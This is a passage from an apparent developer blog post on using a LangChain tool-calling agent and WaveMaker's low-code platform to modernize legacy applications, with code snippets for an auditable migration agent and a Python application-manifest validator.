class="p">,</span> <span class="dl">"</span><span class="s2">{input}</span><span class="dl">"</span><span class="p">],</span> <span class="p">[</span><span class="dl">"</span><span class="s2">placeholder</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">{agent_scratchpad}</span><span class="dl">"</span><span class="p">],</span> <span class="p">]);</span> <span class="kd">const</span> <span class="nx">agent</span> <span class="o">=</span> <span class="nf">createToolCallingAgent</span><span class="p">({</span> <span class="nx">llm</span><span class="p">,</span> <span class="nx">tools</span><span class="p">,</span> <span class="nx">prompt</span> <span class="p">});</span> <span class="kd">const</span> <span class="nx">executor</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">AgentExecutor</span><span class="p">({</span> <span class="nx">agent</span><span class="p">,</span> <span class="nx">tools</span><span class="p">,</span> <span class="na">verbose</span><span class="p">:</span> <span class="kc">true</span> <span class="p">});</span> <span class="kd">const</span> <span class="nx">result</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">executor</span><span class="p">.</span><span class="nf">invoke</span><span class="p">({</span> <span class="na">input</span><span class="p">:</span> <span class="dl">"</span><span class="s2">Analyze the schema at postgres://legacy-db:5432/erp and create a migration plan targeting PostgreSQL 16.</span><span class="dl">"</span><span class="p">,</span> <span class="p">});</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="nx">result</span><span class="p">.</span><span class="nx">output</span><span class="p">);</span> </code></pre> </div> <p>The <code>verbose: true</code> flag here is not just for debugging — in a real modernization workflow, every tool call and observation is logged to an audit trail that project managers and architects can review. Explainability is a first-class requirement when the output feeds a production migration.</p> <h2> Where Low-Code Fits Into the Pipeline </h2> <p>WaveMaker's role in this partnership is not just "the platform you migrate to." Its low-code runtime becomes the <em>target environment</em> that the agent generates against. This matters architecturally because it constrains the output space.</p> <p>When an agent generates arbitrary code, validation is hard. When the agent generates configuration, UI definitions, and service wiring for a known platform, the output can be mechanically validated against a schema before any human reviews it. The feedback loop tightens dramatically.</p> <p>A common pattern in production migration tooling is to represent the target application as a declarative manifest and have the agent populate it incrementally:</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> python import json from dataclasses import dataclass, field from typing import List @dataclass class ServiceDefinition: name: str entity: str operations: List[str] = field(default_factory=list) security_roles: List[str] = field(default_factory=list) @dataclass class AppManifest: app_name: str services: List[ServiceDefinition] = field(default_factory=list) def validate(self) -&gt; bool: for svc in self.services: if not svc.operations: raise ValueError(f"Service {svc.name} has no operations defined") return True def to_json(self) -&gt; str: return json </code></pre> </div> ai modernization lowcode devops